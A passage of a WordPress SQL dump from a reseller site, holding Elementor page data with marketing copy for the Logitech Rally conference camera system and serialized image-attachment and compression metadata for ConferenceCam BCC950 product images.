sound.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a921491\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"3fa5585\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp.jpg\",\"id\":2911}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58834df\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5c2d6f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"456e282\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-1.jpg\",\"id\":2912}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"fc84764\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b27f55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Every component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f623216\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3614128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61805be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of technologies built into Rally that automate a better user experience. RightSight\\u2122 perfectly auto-frames participants no matter their distance from the lens. RightLight\\u2122 prioritizes faces over environment to render natural-looking skin tones while RightSound\\u0099\\u2122 enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings \\u2014 \\u0097automatically!<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7601a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d30db6c\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"612d913\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12cc4b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4df284a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-2.jpg\",\"id\":2913}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b51f998\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7afaa26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMART CABLING AND CONTENT SHARING<\\/h3><p>With a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b6a06a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f826d19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-3.jpg\",\"id\":2914}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2473dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"470dd3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b2bfdfa\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a54b538\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a87eb99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1331\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SEE EVERYONE, PERFECTLY FRAMED<\\/h4><p>Logitech RightSight\\u0099 camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9238ce1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e400259\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>LET THE SUNSHINE IN<\\/h4><p>Even in meeting rooms with bright windows, Logitech RightLight\\u0099 technology with Wide Dynamic Range (WDR) prioritizes faces and human figures over objects and surfaces. The result is a balanced image that renders participants in flattering light with reduced glare and softer shadows, even in dim or backlit conditions<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c3cf6bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"628d3e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ADAPTIVE PAN, TILT AND ZOOM<\\/h4><p>Pan and tilt speeds automatically adapt to the level of zoom. The result: faster camera movement when zoomed out for quick framing and slower camera movement when zoomed in for more control.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a14cdde\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af2bc65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FRONT OF ROOM AUDIO<\\/h4><p>Unlike tabletop speakerphones that decouple voices from video, Rally speakers are designed for placement at the front of the room. By aligning speakers with the display, a person\'\\u0092s voice and video both come from the same place \\u0097 and never from behind you \\u2014 \\u0097 so conversations feel more natural and lifelike.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"92dbf40\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3b7da92\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917f02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>OPTIONAL MOUNTING KIT<\\/h4><p>Add Rally Mounting Kit for a streamlined installation of each component. Strong wall mounts allow ideal placement for the camera and two speakers, while ventilated mounting plates attach the display and table hubs on a wall or beneath a table. Two cleverly-designed retainers keep cables secure.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8f441a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c1a745e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>LOUD AND CLEAR<\\/h4><p>The Rally display hub powers up to two speakers, providing rich sound even in larger rooms. A patent-pending suspension system virtually eliminates vibrations that travel through walls, stands, and tables. This improves echo cancellation while keeping video shake-free, even at high volume levels and when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af53cbc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"18b598e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>UP TO 7 MIC PODS<\\/h4><p>For rooms with more than 10 participants, add Rally Mic Pods to expand audio coverage and provide convenient access to mute controls. Each pod adds coverage for six more participants, so you can deploy Rally in large meeting spaces and boardrooms with up to 46 people.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7e4f1f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e7ae67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FLEXIBLE MIC POD CABLING<\\/h4><p>A more flexible alternative to daisy-chain connections, Rally Mic Pod Hub makes it easy to run cables beneath the table with three connections for Rally Mic Pods or additional Mic Pod Hubs. With a single-cable connection, participants can reposition individual mic pods to make space on the table or to bring mute control within easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a45d7e6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"722f670\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"61e2996\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5704,2971,'_elementor_version','0.4'),(5706,2972,'_edit_lock','1551778521:1'),(5707,2972,'_edit_last','1'),(5708,2972,'_wp_page_template','template-fullwidth.php'),(5709,2972,'_hide_page_title',''),(5710,2972,'_hide_header',''),(5711,2972,'_hide_footer',''),(5712,2972,'_hide_breadcrumb',''),(5713,2972,'_cover',''),(5714,2972,'_show_excerpt',''),(5715,2972,'_wc_apply_product',''),(5716,2972,'_yoast_wpseo_content_score','30'),(5717,2972,'_elementor_edit_mode','builder'),(5718,2972,'_elementor_template_type','post'),(5719,2974,'_wp_attached_file','2019/03/conferencecam-bcc950-1.png'),(5720,2974,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:34:\"2019/03/conferencecam-bcc950-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-300x262.png\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-1-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5721,2974,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.3341739557478664579548421897925436496734619140625;s:5:\"bytes\";i:5024;s:11:\"size_before\";i:150682;s:10:\"size_after\";i:145658;s:4:\"time\";d:0.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1213;s:11:\"size_before\";i:11403;s:10:\"size_after\";i:10190;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1778;s:11:\"size_before\";i:29189;s:10:\"size_after\";i:27411;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10041;s:10:\"size_after\";i:10041;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1240;s:11:\"size_before\";i:37530;s:10:\"size_after\";i:36290;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.270000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:793;s:11:\"size_before\";i:62519;s:10:\"size_after\";i:61726;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(5722,2975,'_wp_attached_file','2019/03/conferencecam-bcc950.jpg'),(5723,2975,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:32:\"2019/03/conferencecam-bcc950.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"conferencecam-bcc950-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5724,2975,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.9003762860826771685651692678220570087432861328125;s:5:\"bytes\";i:9045;s:11:\"size_before\";i:76006;s:10:\"size_after\";i:66961;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:313;s:11:\"size_before\";i:4428;s:10:\"size_after\";i:4115;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:571;s:11:\"size_before\";i:6780;s:10:\"size_after\";i:6209;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:3418;s:11:\"size_before\";i:23194;s:10:\"size_after\";i:19776;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:589;s:11:\"size_before\";i:6795;s:10:\"size_after\";i:6206;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.5;s:5:\"bytes\";i:1612;s:11:\"size_before\";i:14023;s:10:\"size_after\";i:12411;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:2542;s:11:\"size_before\";i:20786;s:10:\"size_after\";i:18244;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5725,2976,'_wp_attached_file','2019/03/conferencecam-bcc950-1.jpg'),(5726,2976,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:34:\"2019/03/conferencecam-bcc950-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5727,2976,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.305232595158353436914921985589899122714996337890625;s:5:\"bytes\";i:5191;s:11:\"size_before\";i:157054;s:10:\"size_after\";i:151863;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:387;s:11:\"size_before\";i:6843;s:10:\"size_after\";i:6456;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:600;s:11:\"size_before\";i:13191;s:10:\"size_after\";i:12591;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.470000000000000195399252334027551114559173583984375;s:5:\"bytes\";i:1286;s:11:\"size_before\";i:52066;s:10:\"size_after\";i:50780;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.75;s:5:\"bytes\";i:561;s:11:\"size_before\";i:11801;s:10:\"size_after\";i:11240;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.770000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1098;s:11:\"size_before\";i:29140;s:10:\"size_after\";i:28042;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.859999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:1259;s:11:\"size_before\";i:44013;s:10:\"size_after\";i:42754;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5728,2977,'_wp_attached_file','2019/03/conferencecam-bcc950-2.jpg'),(5729,2977,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:34:\"2019/03/conferencecam-bcc950-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"conferencecam-bcc950-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5730,2977,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.77318188671659004995717623387463390827178955078125;s:5:\"bytes\";i:6006;s:11:\"size_before\";i:159176;s:10:\"size_after\";i:153170;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.05999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:567;s:11:\"size_before\";i:8028;s:10:\"size_after\";i:7461;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:668;s:11:\"size_before\";i:13301;s:10:\"size_after\";i:12633;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.979999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1557;s:11:\"size_before\";i:52249;s:10:\"size_after\";i:50692;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.29000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:648;s:11:\"size_before\";i:12258;s:10:\"size_after\";i:11610;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1117;s:11:\"size_before\";i:29091;s:10:\"size_after\";i:27974;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.270000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1449;s:11:\"size_before\";i:44249;s:10:\"size_after\";i:42800;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5731,2978,'_elementor_edit_mode','builder'),(5732,2978,'_elementor_template_type','post'),(5733,2978,'_wp_page_template','template-fullwidth.php'),(5734,2978,'_elementor_data','[{\"id\":\"008e84f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"21f0da0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"34477cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>RALLY<\\/h3><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Modular audio for full coverage of medium to very large rooms<\\/li><li>Premium components and sleek industrial design<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5bb4207\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b5262b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9021bd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d99b4d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21995c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL TOGETHER NOW<\\/h3><p>Logitech Rally delivers studio-quality video, unmatched voice clarity, and RightSense\\u2122 automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft Skype\\u00ae for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger 